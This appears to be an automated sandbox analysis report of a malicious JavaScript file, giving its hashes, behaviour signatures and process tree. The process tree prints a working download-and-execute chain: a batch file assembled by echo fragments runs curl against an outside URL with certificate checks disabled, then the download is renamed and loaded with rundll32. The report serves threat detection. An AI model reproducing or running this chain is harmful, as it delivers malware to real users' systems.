Analysis
-
max time kernel
145s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
20-12-2023 10:48
General
-
Target
Notesom.js
-
Size
75KB
-
MD5
b305a98050164ca5bcebb8c41087f8a7
-
SHA1
a505d3d54a7c1c1524f767ceb71433b54a7f769f
-
SHA256
c7fa21a28f06df9fea4cec8343adb4970549f0ce3b67a88a9adb2e74215d7367
-
SHA512
3de349a7dbc8c30086e9a75953836c8d0998ca81a3ad6de4b298e8f81f3f6092ebd261d548f5d3bdb520845228fd6bf845e7374d21dc9bb7776c189c79278195
-
SSDEEP
1536:BALuT+QWqWdxRnzDk4z5/mOx7O8I7neKXhk66:kz3MnXh/6
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Notesom.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Notesom.js"2⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo|set /p="cu" > "C:\Users\Admin\AppData\Local\Temp\corrupti.u.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p="cu" 1>"C:\Users\Admin\AppData\Local\Temp\corrupti.u.bat""3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo rl "https://illemsauto.com/kyaSr/931257706" --output "C:\Users\Admin\AppData\Local\Temp\quisquam.c" --ssl-no-revoke --insecure --location >> "C:\Users\Admin\AppData\Local\Temp\corrupti.u.bat"2⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\corrupti.u.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl "https://illemsauto.com/kyaSr/931257706" --output "C:\Users\Admin\AppData\Local\Temp\quisquam.c" --ssl-no-revoke --insecure --location3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\corrupti.u.bat"2⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\quisquam.c" sed.w2⤵
-
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\sed.w" Enter2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
142B
MD52410abec2a068ae7ffeddc39d1a4af1c
SHA1f55e04b8eb16d5d6799ebbb0662013096803b372
SHA256b4f7f31953bea6746ac984339a8df2a3c28ab57d8ee8f91bd7f1f6509809cb84
SHA51266f291db4ff837672235adcec8612191913faa281a29a4de354be3de068920a7e6ed05727ebc81fb2a52bf73571537498009683c216f9dbf5631a8f1cb82bcd4